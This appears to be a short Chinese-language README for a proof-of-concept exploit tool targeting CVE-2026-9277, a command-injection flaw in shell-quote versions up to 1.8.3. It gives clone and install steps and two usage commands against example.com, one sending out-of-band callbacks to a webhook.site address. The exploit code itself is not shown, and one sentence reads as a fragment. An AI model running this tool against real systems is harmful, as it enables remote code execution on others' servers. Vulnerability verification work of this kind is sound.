一个专门用于验证和演示 CVE-2026-9277 的概念验证(PoC)漏洞利用脚本——该漏洞是 shell-quote 库旧版本(<= 1.8.3)中存在的一个结构性命令注入漏洞。
该扫描器对输入 JSON 载荷执行深度结构操作,通过递归遍历暴露远程代码执行(RCE)向量,并利用动态网络基线计时引擎防止误报。
{"op": "..."} 组件与参数分离来处理高级带外(Out-of-Band)执行布局,从而成功绕过字符串隔离控制。请确保已安装 Python 3.10+ 及所需软件包:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
